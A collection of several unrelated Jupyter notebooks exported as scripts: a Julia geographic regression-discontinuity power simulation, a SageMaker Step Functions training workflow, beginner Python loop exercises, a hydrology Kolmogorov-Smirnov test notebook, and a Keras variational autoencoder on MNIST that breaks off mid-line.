# $$
# \newcommand{\genericdel}[3]{%
# \left#1#3\right#2
# }
# \newcommand{\del}[1]{\genericdel(){#1}}
# \newcommand{\sbr}[1]{\genericdel[]{#1}}
# \newcommand{\cbr}[1]{\genericdel\{\}{#1}}
# \newcommand{\abs}[1]{\genericdel||{#1}}
# \DeclareMathOperator*{\argmin}{arg\,min}
# \DeclareMathOperator*{\argmax}{arg\,max}
# \DeclareMathOperator{\Pr}{\mathbb{p}}
# \DeclareMathOperator{\E}{\mathbb{E}}
# \DeclareMathOperator{\Ind}{\mathbb{I}}
# \DeclareMathOperator{\V}{\mathbb{V}}
# \DeclareMathOperator{\cov}{Cov}
# \DeclareMathOperator{\var}{Var}
# \DeclareMathOperator{\ones}{\mathbf{1}}
# \DeclareMathOperator{\invchi}{\mathrm{Inv-\chi}^2}
# \DeclareMathOperator*{\argmin}{arg\,min}
# \DeclareMathOperator*{\argmax}{arg\,max}
# \newcommand{\effect}{\mathrm{eff}}
# \newcommand{\xtilde}{\widetilde{X}}
# \DeclareMathOperator{\normal}{\mathcal{N}}
# \DeclareMathOperator{\unif}{Uniform}
# \newcommand{\boxleft}{\unicode{x25E7}}
# \newcommand{\boxright}{\unicode{x25E8}}
# \newcommand{\discont}{\unicode{x25EB}}
# \newcommand{\jleft}{\unicode{x21E5}}
# \newcommand{\jright}{\unicode{x21E4}}
# \DeclareMathOperator*{\gp}{\mathcal{GP}}
# \newcommand{\trans}{^{\intercal}}
# \newcommand{\scrS}{\mathscr{S}}
# \newcommand{\sigmaf}{\sigma_{\mathrm{GP}}}
# \newcommand{\sigman}{\sigma_{\epsilon}}
# \newcommand{\sigmatau}{\sigma_{\tau}}
# \newcommand{\sigmabeta}{\sigma_{\beta}}
# \newcommand{\sigmamu}{\sigma_{\mu}}
# \newcommand{\sigmagamma}{\sigma_{\gamma}}
# \newcommand{\svec}{\mathbf{s}}
# \newcommand{\yvec}{\mathbf{y}}
# \newcommand{\muvec}{\mathbf{\mu}}
# \newcommand{\indep}{\perp}
# \newcommand{\iid}{iid}
# \newcommand{\vectreat}{\Ind_{T}}
# \newcommand{\yt}{Y^\mathrm{T}}
# \newcommand{\yc}{Y^\mathrm{C}}
# \newcommand{\boundary}{\partial}
# \newcommand{\sentinels}{\mathbf{\boundary}}
# \newcommand{\eye}{\mathbf{I}}
# \newcommand{\K}{\mathbf{K}}
# \DeclareMathOperator{\trace}{trace}
# \newcommand{\linavg}{\bar{\tau}}
# \newcommand{\invvar}{\tau^{IV}}
# \newcommand{\modnull}{\mathscr{M}_0}
# \newcommand{\modalt}{\mathscr{M}_1}
# \newcommand{\degree}{\hspace{0pt}^\circ}
# $$
do_savefig = false
figures_dir = "insert/path/where/figures/should/be/saved/"
;
using LaTeXStrings
using GaussianProcesses
using Distributions
using Base.LinAlg
using Distances
import PyPlot; plt=PyPlot
plt.rc("figure", dpi=300.0)
# plt.rc("figure", figsize=(6,4))
plt.rc("figure", autolayout=true)
plt.rc("savefig", dpi=300.0)
plt.rc("text", usetex=true)
plt.rc("font", family="serif")
plt.rc("font", serif="Palatino")
;
using GeoRDD
# # Experiment
X_LA = readcsv("Mississippi_data/X_LA.csv")
X_MS = readcsv("Mississippi_data/X_MS.csv")
border_XY = readcsv("Mississippi_data/border.csv")
border = LibGEOS.LineString([border_XY[i,:] for i in 1:size(border_XY,1)])
sentinels = GeoRDD.sentinels(border, 200)
;
n_MS = size(X_MS, 2)
n_LA = size(X_LA, 2)
Y_MS = zeros(n_MS)
Y_LA = zeros(n_LA)
;
k = SEIso(log(100e3), 0.0)
k2 = k + Const(log(100.0))
gp_MS = GP(X_MS, Y_MS, MeanZero(), k2, 0.0)
gp_LA = GP(X_LA, Y_LA, MeanZero(), k2, 0.0)
;
srand(4)
τ = 1.2
gpNull = GeoRDD.make_null(gp_MS, gp_LA)
Ysim = GeoRDD.prior_rand(gpNull)
Ysim .-= mean(Ysim)
Ysim[1:gp_MS.nobsv] .+= τ
Ysim_MS = Ysim[1:gp_MS.nobsv]
Ysim_LA = Ysim[gp_MS.nobsv+1:end]
minY = minimum(Ysim)
maxY = maximum(Ysim)
gp_MS.y = Ysim_MS
gp_LA.y = Ysim_LA
GeoRDD.update_mll!(gp_MS)
GeoRDD.update_mll!(gp_LA)
;
GeoRDD.pval_invvar_calib(gp_MS, gp_LA, sentinels)
@time GeoRDD.boot_chi2test(gp_MS, gp_LA, sentinels, 10000)
@time GeoRDD.boot_chi2test(gp_MS, gp_LA, sentinels, 10000)
@time GeoRDD.boot_mlltest(gp_MS, gp_LA, 10000)
# ## Plot outcomes
using PyCall
@pyimport mpl_toolkits.axes_grid1.anchored_artists as anchored_artists
cbbPalette = ["#E69F00", "#56B4E9", "#009E73", "#F0E442", "#0072B2", "#D55E00", "#CC79A7"]
plt.gcf()[:set_size_inches](10.0, 5.0)
plt.subplot(1,2,1)
scale=10
# s=scale*(Ysim_LA-minY)+1
plt.scatter(X_LA[1,:], X_LA[2,:], marker="o", c=Ysim_LA, vmin=-1, vmax=3, s=100)
ax = plt.gca()
ax[:axis]("off")
ax[:axes][:set_aspect]("equal", "datalim")
plt.plot(border_XY[:,1], border_XY[:,2], color="black")
plt.scatter(X_MS[1,:], X_MS[2,:], marker="o", c=Ysim_MS, vmin=-1, vmax=3, s=100)
sizebar = anchored_artists.AnchoredSizeBar(ax[:transData], 100*1000, "100 km", 2; frameon=false)
ax[:add_artist](sizebar)
plt.colorbar()
if do_savefig
plt.savefig(joinpath(figures_dir, "mississippi_sim.png"), bbox_inches="tight")
plt.savefig(joinpath(figures_dir, "mississippi_sim.pdf"), bbox_inches="tight")
end
;
srand(1)
@time p_invvar_sims = GeoRDD.nsim_invvar_pval(gp_MS, gp_LA, sentinels, 100000);
# +
@time mLL_sims = let
gpT = gp_MS
gpC = gp_LA
gpNull = GeoRDD.make_null(gpT, gpC)
GeoRDD.nsim_logP(gp_MS, gp_LA, gpNull, 100_000)
end
mLL_sim_null = [sim[1] for sim in mLL_sims]
mLL_sim_altv = [sim[2] for sim in mLL_sims]
;
# -
@time chi_sims_μ = let
gpT = gp_MS
gpC = gp_LA
# yNull = [gpT.y; gpC.y]
# xNull = [gpT.X gpC.X]
# kNull = gpT.k
# mNull = gpT.m
gpNull = GeoRDD.make_null(gpT, gpC)
GeoRDD.nsim_chi(gp_MS, gp_LA, gpNull, sentinels, 100_000)
end
;
# # Power
τ=1.2
srand(1)
@time power_sims = GeoRDD.nsim_power(gp_MS, gp_LA, τ, sentinels,
chi_sims_μ, mLL_sim_altv.-mLL_sim_null, p_invvar_sims,
10000
);
τ=0.0
srand(1)
@time power_sims_null = GeoRDD.nsim_power(gp_MS, gp_LA, τ, sentinels,
chi_sims_μ, mLL_sim_altv.-mLL_sim_null, p_invvar_sims,
10000
);
# ## plot power
# +
cbbPalette = ["#E69F00", "#56B4E9", "#009E73", "#F0E442", "#0072B2", "#D55E00", "#CC79A7"]
bins=linspace(0,1.1,1000)
plt.figure(figsize=(10,5))
plt.subplot(1,2,1)
plt.plot([0.0,1.0],[0.0,1.0], color="#222222", linewidth=2)
plt.plot(sort([s[1] for s in power_sims_null]),
linspace(0,1,length(power_sims_null)),
color=cbbPalette[1],
label="mLL",
linewidth=2,
)
plt.plot(sort([s[2] for s in power_sims_null]),
linspace(0,1,length(power_sims_null)),
color=cbbPalette[2],
label=L"\chi^2",
linewidth=2,
)
plt.plot(sort([s[3] for s in power_sims_null]),
linspace(0,1,length(power_sims_null)),
color=cbbPalette[3],
label=L"$\Sigma^{-1}$-weighted",
linewidth=2,
)
# bootstrap calibration
plt.plot(sort([s[5] for s in power_sims_null]),
linspace(0,1,length(power_sims_null)),
color=cbbPalette[3],
linestyle=":",
label=L"$\Sigma^{-1}$-weighted calibrated",
linewidth=2,
)
plt.xlabel(L"Significance level $\alpha$")
plt.ylabel("Power")
plt.legend(loc="lower right", fontsize="small")
plt.title(L"Power under $\tau=0$")
plt.xlim(0,0.3)
plt.ylim(0,0.3)
plt.subplot(1,2,2)
plt.plot([0.0,1.0],[0.0,1.0], color="#222222", linewidth=2)
plt.plot(sort([s[1] for s in power_sims]),
linspace(0,1,length(power_sims)),
color=cbbPalette[1],
label="mLL",
linewidth=2,
)
plt.plot(sort([s[2] for s in power_sims]),
linspace(0,1,length(power_sims)),
color=cbbPalette[2],
label=L"\chi^2",
linewidth=2,
)
plt.plot(sort([s[3] for s in power_sims]),
linspace(0,1,length(power_sims)),
color=cbbPalette[3],
label=L"$\Sigma^{-1}$-weighted",
linewidth=2,
)
# bootstrap calibration
plt.plot(sort([s[5] for s in power_sims]),
linspace(0,1,length(power_sims)),
color=cbbPalette[3],
linestyle=":",
label=L"$\Sigma^{-1}$-weighted calibrated",
linewidth=2,
)
plt.xlabel(L"Significance level $\alpha$")
plt.ylabel("Power")
plt.title(@sprintf("Power under \$\\tau\$=%.1f", τ))
plt.xlim(0,0.3)
plt.ylim(0,1.0)
;
# -
# ## generate table
import DataFrames
power_df = DataFrames.DataFrame()
power_df[:estimator] = LaTeXString.([
"Marginal log-likelihood bootstrap",
raw"\(\chi^2\) bootstrap",
raw"\(\invvar\) uncalibrated",
raw"\(\invvar\) bootstrap calibrated",
raw"\(\invvar\) analytically calibrated"]
)
α = 0.05
pval_fmt(pvals, α) = @sprintf("%.2f", mean(p < α for p in pvals))
power_df[:null] = [pval_fmt((ps[i] for ps in power_sims_null), α) for i in 1:5]
power_df[:altv] = [pval_fmt((ps[i] for ps in power_sims), α) for i in 1:5]
power_df
print(reprmime("text/latex", power_df))
# source notebook: notebooks/Mississippi_sharp_null_sims.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: conda_python3
# language: python
# name: conda_python3
# ---
# + language="sh"
# pip -q install sagemaker stepfunctions --upgrade
# -
# Enter your role ARN
workflow_execution_role = ''  # paste your Step Functions workflow execution role ARN here
# +
import boto3
import sagemaker
import stepfunctions
from stepfunctions import steps
from stepfunctions.steps import TrainingStep, ModelStep, EndpointConfigStep, EndpointStep, TransformStep, Chain
from stepfunctions.steps.states import Parallel
from stepfunctions.inputs import ExecutionInput
from stepfunctions.workflow import Workflow
# +
sess = sagemaker.Session()
bucket = sess.default_bucket()
role = sagemaker.get_execution_role()
prefix = 'sklearn-boston-housing-stepfunc'
training_data = sess.upload_data(path='housing.csv', key_prefix=prefix + "/training")
output = 's3://{}/{}/output/'.format(bucket,prefix)
print(training_data)
print(output)
# +
import pandas as pd
data = pd.read_csv('housing.csv')
data.drop(['medv'], axis=1, inplace=True)
data.to_csv('test.csv', index=False, header=False)
batch_data = sess.upload_data(path='test.csv', key_prefix=prefix + "/batch")
# +
from sagemaker.sklearn import SKLearn
sk = SKLearn(entry_point='sklearn-boston-housing.py',
role=role,
framework_version='0.20.0',
instance_count=1,
instance_type='ml.m5.large',
output_path=output,
hyperparameters={
'normalize': True,
'test-size': 0.1
}
)
# -
execution_input = ExecutionInput(schema={
'JobName': str,
'ModelName': str,
'EndpointName': str
})
training_step = TrainingStep(
'Train a Scikit-Learn script on the Boston Housing dataset',
estimator=sk,
data={'training': sagemaker.s3_input(training_data, content_type='text/csv')},
job_name=execution_input['JobName']
)
model_step = ModelStep(
'Create the model in SageMaker',
model=training_step.get_expected_model(),
model_name=execution_input['ModelName']
)
transform_step = TransformStep(
'Transform the dataset in batch mode',
transformer=sk.transformer(instance_count=1, instance_type='ml.m5.large'),
job_name=execution_input['JobName'],
model_name=execution_input['ModelName'],
data=batch_data,
content_type='text/csv'
)
batch_branch = Chain([
transform_step
])
endpoint_config_step = EndpointConfigStep(
"Create an endpoint configuration for the model",
endpoint_config_name=execution_input['ModelName'],
model_name=execution_input['ModelName'],
initial_instance_count=1,
instance_type='ml.m5.large'
)
endpoint_step = EndpointStep(
"Create an endpoint hosting the model",
endpoint_name=execution_input['EndpointName'],
endpoint_config_name=execution_input['ModelName']
)
endpoint_branch = Chain([
endpoint_config_step,
endpoint_step
])
# +
parallel_step = Parallel(
'Parallel execution'
)
parallel_step.add_branch(batch_branch)
parallel_step.add_branch(endpoint_branch)
# -
workflow_definition = Chain([
training_step,
model_step,
parallel_step
])
# +
import time
timestamp = time.strftime("%Y-%m-%d-%H-%M-%S", time.gmtime())
workflow = Workflow(
name='sklearn-boston-housing-workflow2-{}'.format(timestamp),
definition=workflow_definition,
role=workflow_execution_role,
execution_input=execution_input
)
# -
workflow.render_graph(portrait=True)
workflow.create()
execution = workflow.execute(
inputs={
'JobName': 'sklearn-boston-housing-{}'.format(timestamp),
'ModelName': 'sklearn-boston-housing-{}'.format(timestamp),
'EndpointName': 'sklearn-boston-housing-{}'.format(timestamp)
}
)
execution.render_progress()
execution.list_events(html=True)
workflow.list_executions(html=True)
Workflow.list_workflows(html=True)
# ---
# source notebook: sdkv2/ch12/step_functions/Scikit-Learn on Boston Housing - v2.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] deletable=true editable=true
# Ex1.
# + deletable=true editable=true
for j in range(1,4):
for k in range(1,6):
print(j,k,j*k)
print()
# + [markdown] deletable=true editable=true
# Ex2. Sol1.
# + deletable=true editable=true
for i in range(1,10):
lst=[]
for j in range(1,10):
lst.append(i*j)
print(lst)
# + [markdown] deletable=true editable=true
# Ex2. Sol2.
# + deletable=true editable=true
for i in range(1,10):
lst=[i*j for j in list(range(1,10))]
print(lst)
# + [markdown] deletable=true editable=true
# Ex2. Sol3.
# + deletable=true editable=true
lst=list(range(1,10))
for k in range(1,10):
print(list(map( (lambda x:k*x) ,lst)))
# + [markdown] deletable=true editable=true
# Ex2. Sol4.
# + deletable=true editable=true
import numpy as np
for j in range(1,10):
print(j*np.linspace(1,9,9))
# + deletable=true editable=true
# source notebook: exercises/.ipynb_checkpoints/solution-checkpoint.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="vTbvS7mlWHT_"
# Based on issue [#140](https://github.com/hidrokit/hidrokit/issues/140): **Kolmogorov-Smirnov Test**
#
# Issue references:
# - <NAME>., <NAME>., Press, U. B., & Media, U. (2017). Rekayasa Statistika untuk Teknik Pengairan. Universitas Brawijaya Press. https://books.google.co.id/books?id=TzVTDwAAQBAJ
# - Soewarno. (1995). hidrologi: Aplikasi Metode Statistik untuk Analisa Data. NOVA.
# - <NAME>. (2018). Rekayasa Hidrologi.
#
# Issue description:
# - Perform a distribution goodness-of-fit test using the Kolmogorov-Smirnov test.
#
# Strategy:
# - Build the _inverse_ / CDF function for each distribution used (already completed in issue [#179](https://github.com/hidrokit/hidrokit/issues/179)).
# - Results are not compared against the `scipy.stats.kstest` function.
# + [markdown] id="wKVU8TNyWYCw"
# # SETUP AND DATASET
# + id="ADlBvxJ1SC5O"
try:
import hidrokit
except ModuleNotFoundError:
    # built using the @dev/dev0.3.7 branch at the time of writing
# !pip install git+https://github.com/taruma/hidrokit.git@dev/dev0.3.7 -q
# + id="BF91rLR2V2xt"
import numpy as np
import pandas as pd
from scipy import stats
from hidrokit.contrib.taruma import hk172, hk124, hk127, hk126
frek_normal, frek_lognormal, frek_gumbel, frek_logpearson3 = hk172, hk124, hk127, hk126
# + colab={"base_uri": "https://localhost:8080/", "height": 394} id="jfL0hzvtqfem" outputId="045d43c7-b740-44cf-ee9c-82ca6c8c95fb"
# sample data taken from the book
# Limantara, p. 114
_HUJAN = np.array([85, 92, 115, 116, 122, 52, 69, 95, 96, 105])
_TAHUN = np.arange(1998, 2008) # 1998-2007
data = pd.DataFrame(
data=np.stack([_TAHUN, _HUJAN], axis=1),
columns=['tahun', 'hujan']
)
data.tahun = pd.to_datetime(data.tahun, format='%Y')
data.set_index('tahun', inplace=True)
data
# + [markdown] id="pn3l9uqhlwOs"
# # TABLES
#
# There are 2 tables for the `hk140` module:
# - `t_dcr_st`: table of critical values (Dcr) for the Kolmogorov-Smirnov test, from the book _Rekayasa Statistika untuk Teknik Pengairan_ by Soetopo.
# - `t_dcr_sw`: table of critical values (Do) for the Smirnov-Kolmogorov test, from the book _hidrologi: Aplikasi Metode Statistik untuk Analisa Data_ by Soewarno.
#
# In the `hk126` module the $\Delta_{kritis}$ value is generated with `scipy.stats.ksone.ppf` by `default`. Take care if you want to use a $\Delta_{kritis}$ value from another source.
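# As a quick sanity check (a sketch of the module's scipy default, not part of the original notebook), the critical value for $n = 10$, $\alpha = 0.05$ from `scipy.stats.ksone` should land near the roughly 0.41 reported in the tables below:

```python
from scipy import stats

n, alpha = 10, 0.05
# two-sided critical value approximated via the one-sided distribution at alpha/2
dcr = stats.ksone.ppf(1 - alpha / 2, n)
print(round(dcr, 3))
```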
# + colab={"base_uri": "https://localhost:8080/", "height": 677} id="bYkR_ZhZU9um" outputId="0d697df4-a933-4b0a-b084-d341c1db0bff"
# table from Soetopo, p. 139
# Table of critical values (Dcr) for the Kolmogorov-Smirnov test
# CODE: ST
_DATA_ST = [
[0.900, 0.925, 0.950, 0.975, 0.995],
[0.684, 0.726, 0.776, 0.842, 0.929],
[0.565, 0.597, 0.642, 0.708, 0.829],
[0.494, 0.525, 0.564, 0.624, 0.734],
[0.446, 0.474, 0.510, 0.563, 0.669],
[0.410, 0.436, 0.470, 0.521, 0.618],
[0.381, 0.405, 0.438, 0.486, 0.577],
[0.358, 0.381, 0.411, 0.457, 0.543],
[0.339, 0.360, 0.388, 0.432, 0.514],
[0.322, 0.342, 0.368, 0.409, 0.486],
[0.307, 0.326, 0.352, 0.391, 0.468],
[0.295, 0.313, 0.338, 0.375, 0.450],
[0.284, 0.302, 0.325, 0.361, 0.433],
[0.274, 0.292, 0.314, 0.349, 0.418],
[0.266, 0.283, 0.304, 0.338, 0.404],
[0.258, 0.274, 0.295, 0.328, 0.391],
[0.250, 0.266, 0.286, 0.318, 0.380],
[0.244, 0.259, 0.278, 0.309, 0.370],
[0.237, 0.252, 0.272, 0.301, 0.361],
[0.231, 0.246, 0.264, 0.294, 0.352],
]
_INDEX_ST = range(1, 21)
_COL_ST = [0.2, 0.15, 0.1, 0.05, 0.01]
t_dcr_st = pd.DataFrame(
data=_DATA_ST, index=_INDEX_ST, columns=_COL_ST
)
t_dcr_st
# + colab={"base_uri": "https://localhost:8080/", "height": 363} id="XuNz6_5dmRxr" outputId="608a622f-8757-48e3-e73f-b9a8ff8d473b"
# table from Soewarno, p. 139
# Table of critical values (Dcr) for the Kolmogorov-Smirnov test
# CODE: SW
_DATA_SW = [
[0.45, 0.51, 0.56, 0.67],
[0.32, 0.37, 0.41, 0.49],
[0.27, 0.3 , 0.34, 0.4 ],
[0.23, 0.26, 0.29, 0.35],
[0.21, 0.24, 0.26, 0.32],
[0.19, 0.22, 0.24, 0.29],
[0.18, 0.2 , 0.22, 0.27],
[0.17, 0.19, 0.21, 0.25],
[0.16, 0.18, 0.2 , 0.24],
[0.15, 0.17, 0.19, 0.23]
]
_INDEX_SW = range(5, 51, 5)
_COL_SW = [0.2, 0.1, 0.05, 0.01]
t_dcr_sw = pd.DataFrame(
data=_DATA_SW, index=_INDEX_SW, columns=_COL_SW
)
t_dcr_sw
# + [markdown] id="6idc0EuZYb_B"
# # CODE
# + id="LEj79zOznHKJ"
# INTERPOLATION FUNCTIONS BUILT FROM THE TABLES
from scipy import interpolate
def _func_interp_bivariate(df):
    "Build a bilinear interpolation function from a table"
table = df[df.columns.sort_values()].sort_index().copy()
x = table.index
y = table.columns
z = table.to_numpy()
    # kx=1, ky=1 gives linear interpolation between 2 points
    # (not cubic spline interpolation)
return interpolate.RectBivariateSpline(x, y, z, kx=1, ky=1)
def _as_value(x, dec=4):
x = np.around(x, dec)
return x.flatten() if x.size > 1 else x.item()
def _calc_k(x):
return (x - x.mean()) / x.std()
# + id="i7yYxte8nkCB"
table_source = {
'soewarno': t_dcr_sw,
'soetopo': t_dcr_st
}
anfrek = {
'normal': frek_normal,
'lognormal': frek_lognormal,
'gumbel': frek_gumbel,
'logpearson3': frek_logpearson3
}
def calc_dcr(alpha, n, source='scipy'):
alpha = np.array(alpha)
if source.lower() == 'scipy':
# ref: https://stackoverflow.com/questions/53509986/
return stats.ksone.ppf(1-alpha/2, n)
elif source.lower() in table_source.keys():
func_table = _func_interp_bivariate(table_source[source.lower()])
        # soewarno rounds to 2 decimal places, soetopo to 3
dec = (source.lower() == 'soetopo') + 2
return _as_value(func_table(n, alpha, grid=False), dec)
def kstest(
df, col=None, dist='normal', source_dist='scipy',
alpha=0.05, source_dcr='scipy', show_stat=True, report='result'
):
source_dist = 'gumbel' if dist.lower() == 'gumbel' else source_dist
col = df.columns[0] if col is None else col
data = df[[col]].copy()
n = len(data)
data = data.rename({col: 'x'}, axis=1)
data = data.sort_values('x')
data['no'] = np.arange(n) + 1
# w = weibull
data['p_w'] = data.no / (n+1)
if dist.lower() in ['normal', 'gumbel']:
data['k'] = _calc_k(data.x)
if dist.lower() in ['lognormal', 'logpearson3']:
data['log_x'] = np.log10(data.x)
data['k'] = _calc_k(data.log_x)
func = anfrek[dist.lower()]
if dist.lower() in ['normal', 'lognormal']:
parameter = ()
elif dist.lower() == 'gumbel':
parameter = (n,)
elif dist.lower() == 'logpearson3':
parameter = (data.log_x.skew(),)
    # d = distribution
data['p_d'] = func.calc_prob(data.k, source=source_dist, *parameter)
data['d'] = (data.p_w - data.p_d).abs()
dmax = data.d.max()
dcr = calc_dcr(alpha, n, source=source_dcr)
result = int(dmax < dcr)
    result_text = ['Distribution Not Accepted', 'Distribution Accepted']
if show_stat:
        print(f'Goodness-of-fit check for the {dist.title()} distribution')
        print(f'Critical Delta = {dcr:.5f}')
        print(f'Max Delta = {dmax:.5f}')
        print(f'Result (Dmax < Dcr) = {result_text[result]}')
if report.lower() == 'result':
return data['no x p_w p_d d'.split()]
elif report.lower() == 'full':
return data
# + [markdown] id="j9zfA3woZJHh"
# # FUNCTIONS
# + [markdown] id="3QMJTVF4ZKQx"
# ## Function `calc_dcr(alpha, n, ...)`
#
# Function: `calc_dcr(alpha, n, source='scipy')`
#
# The `calc_dcr(...)` function looks up the critical Delta value (Dcr / $\Delta_{kritis}$) from various sources, given the level of significance $\alpha$ and the number of data points $n$.
#
# - Positional arguments:
#   - `alpha`: the _level of significance_ $\alpha$, as a decimal ($\left(0,1\right) \in \mathbb{R}$).
#   - `n`: the number of data points.
# - Optional arguments:
#   - `source`: source of the `Dcr` value, `'scipy'` (default). Available sources: Soetopo (`'soetopo'`), Soewarno (`'soewarno'`).
#
# Note that the valid ranges of $\alpha$ and $n$ differ for each table:
# - For `soetopo` the range is $\alpha = \left[0.2,0.01\right]$ with $n = \left[1,20\right]$
# - For `soewarno` the range is $\alpha = \left[0.2,0.01\right]$ with $n = \left[5,50\right]$
#
# For $n > 50$, `scipy` is recommended.
# + colab={"base_uri": "https://localhost:8080/"} id="_CNKE6VffXtw" outputId="38f482f4-410b-4686-eaf7-2a2341cde98b"
calc_dcr(0.2, 10)
# + colab={"base_uri": "https://localhost:8080/"} id="RMXPAyD0fdae" outputId="5bda9bdc-3b54-41fb-d295-ffb81fd1137f"
calc_dcr(0.15, 10, source='soetopo')
# + colab={"base_uri": "https://localhost:8080/"} id="JJf9s5GTfqoz" outputId="7f5646b3-1e14-4a5b-e130-0b524864365a"
# compare the table values against the scipy function
source_test = ['soewarno', 'soetopo', 'scipy']
_n = 10
_alpha = [0.2, 0.15, 0.1, 0.07, 0.05, 0.01]
for _source in source_test:
print(f'Dcr {_source:<12}=', calc_dcr(_alpha, _n, source=_source))
# + [markdown] id="pMaqh10eg97J"
# ## Function `kstest(df, ...)`
#
# Function: `kstest(df, col=None, dist='normal', source_dist='scipy', alpha=0.05, source_dcr='scipy', show_stat=True, report='result')`
#
# The `kstest(...)` function performs the Kolmogorov-Smirnov test against the chosen distribution. It returns a `pandas.DataFrame` object.
#
# - Positional arguments:
#   - `df`: `pandas.DataFrame`.
# - Optional arguments:
#   - `col`: column name, `None` (default). If omitted, the first column of `df` is used as the input data.
#   - `dist`: the distribution to compare against, `'normal'` (normal distribution) (default). Available distributions: Log Normal (`'lognormal'`), Gumbel (`'gumbel'`), Log Pearson 3 (`'logpearson3'`).
#   - `source_dist`: source of the distribution computation, `'scipy'` (default). See the individual frequency-analysis modules for details.
#   - `alpha`: the $\alpha$ value, `0.05` (default).
#   - `source_dcr`: source of the Dcr value, `'scipy'` (default). Available sources: Soetopo (`'soetopo'`), Soewarno (`'soewarno'`).
#   - `show_stat`: print the test summary, `True` (default).
#   - `report`: which columns appear in the output dataframe, `'result'` (default). Use `'full'` to see all intermediate columns.
# + colab={"base_uri": "https://localhost:8080/", "height": 464} id="eJUJM8fvAqAz" outputId="96aba277-f1b7-40ba-e311-d914189e4a6e"
kstest(data)
# + colab={"base_uri": "https://localhost:8080/"} id="5ReL3Yc4WX7Y" outputId="e5139a10-17f2-4a1b-cb1a-ca81c7bc7cd7"
kstest(data, dist='gumbel', source_dist='soetopo');
# + colab={"base_uri": "https://localhost:8080/", "height": 464} id="53Y_niHxWaIX" outputId="8a4b6c0c-4d0c-4f0a-8139-4ecc115471b2"
kstest(data, dist='logpearson3', alpha=0.2, source_dcr='soetopo', report='full')
# + [markdown] id="wOWoCwSek9JG"
# # Changelog
#
# ```
# - 20220316 - 1.0.0 - Initial
# ```
#
# #### Copyright © 2022 [<NAME>](https://taruma.github.io)
#
# Source code in this notebook is licensed under a [MIT License](https://choosealicense.com/licenses/mit/). Data in this notebook is licensed under a [Creative Common Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0/).
#
# source notebook: booklet_hidrokit/0.4.0/ipynb/manual/taruma_0_4_0_hk140_kolmogorov_smirnov.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
from keras.layers import Input, Dense, Lambda
from keras.layers.merge import concatenate as concat
from keras.models import Model
from keras import backend as K
from keras.datasets import mnist
from keras.utils import to_categorical
from keras.callbacks import EarlyStopping
from keras.optimizers import Adam
from io import BytesIO
import PIL
from IPython.display import clear_output, Image, display, HTML
# +
def prepare(images, labels):
images = images.astype('float32') / 255
n, w, h = images.shape
return images.reshape((n, w * h)), to_categorical(labels)
train, test = mnist.load_data()
x_train, y_train = prepare(*train)
x_test, y_test = prepare(*test)
img_width, img_height = train[0].shape[1:]
# +
batch_size = 250
latent_space_depth = 2
def sample_z(args):
z_mean, z_log_var = args
eps = K.random_normal(shape=(batch_size, latent_space_depth), mean=0., stddev=1.)
return z_mean + K.exp(z_log_var / 2) * eps
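# The reparameterization trick used by `sample_z` can be illustrated in plain NumPy (an illustration only, not the Keras graph itself): drawing z ~ N(mu, sigma^2) as mu + sigma * eps keeps the randomness in eps, so gradients can flow through `z_mean` and `z_log_var`:

```python
import numpy as np

rng = np.random.default_rng(0)
mu = np.zeros((4, 2))                # batch of 4, latent depth 2
log_var = np.zeros((4, 2))           # log variance 0  ->  sigma = 1
eps = rng.standard_normal((4, 2))    # all randomness lives here
z = mu + np.exp(log_var / 2) * eps   # same formula as sample_z above
print(z.shape)                       # (4, 2)
```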
# +
def VariationalAutoEncoder(num_pixels):
pixels = Input(shape=(num_pixels,))
encoder_hidden = Dense(512, activation='relu')(pixels)
z_mean = Dense(latent_space_depth, activation='linear')(encoder_hidden)
z_log_var = Dense(latent_space_depth, activation='linear')(encoder_hidden)
def KL_loss(y_true, y_pred):
return(0.5 * K.sum(K.exp(z_log_var) + K.square(z_mean) - 1 - z_log_var, axis=1))
def reconstruction_loss(y_true, y_pred):
return K.sum(K.binary_crossentropy(y_true, y_pred), axis=-1)
def total_loss(y_true, y_pred):
return KL_loss(y_true, y_pred) + reconstruction_loss(y_true, y_pred)
z = Lambda(sample_z, output_shape=(latent_space_depth, ))([z_mean, z_log_var])
decoder_hidden = Dense(512, activation='relu')
reconstruct_pixels = Dense(num_pixels, activation='sigmoid')
decoder_in = Input(shape=(latent_space_depth,))
hidden = decoder_hidden(decoder_in)
decoder_out = reconstruct_pixels(hidden)
decoder = Model(decoder_in, decoder_out)
hidden = decoder_hidden(z)
outputs = reconstruct_pixels(hidden)
auto_encoder = Model(pixels, outputs)
auto_encoder.compile(optimizer=Adam(lr=0.001),
loss=total_loss,
metrics=[KL_loss, reconstruction_loss])
return auto_encoder, decoder
auto_encoder, decoder = VariationalAutoEncoder(x_train.shape[1])
auto_encoder.summary()
# -
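# The `KL_loss` above is the closed-form KL divergence between $\mathcal{N}(\mu, \sigma^2)$ and the standard normal prior, $\tfrac{1}{2}\sum\left(e^{\log\sigma^2} + \mu^2 - 1 - \log\sigma^2\right)$. A small NumPy sketch (an illustration, not part of the model) shows it vanishes exactly when the encoder outputs the prior ($\mu = 0$, $\log\sigma^2 = 0$) and grows as the posterior drifts away:

```python
import numpy as np

def kl_to_standard_normal(z_mean, z_log_var):
    # 0.5 * sum(exp(log_var) + mean^2 - 1 - log_var), as in KL_loss above
    return 0.5 * np.sum(np.exp(z_log_var) + z_mean**2 - 1.0 - z_log_var)

print(kl_to_standard_normal(np.zeros(2), np.zeros(2)))           # 0.0
print(kl_to_standard_normal(np.array([1.0, 0.0]), np.zeros(2)))  # 0.5
```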
x_train.shape, y_train.shape, x_test.shape, y_test.shape
auto_encoder.fit(x_train, x_train, verbose=1,
batch_size=batch_size, epochs=100,
validation_data=(x_test, x_test))
# +
random_number = np.asarray([[np.random.normal()
for _ in range(latent_space_depth)]])
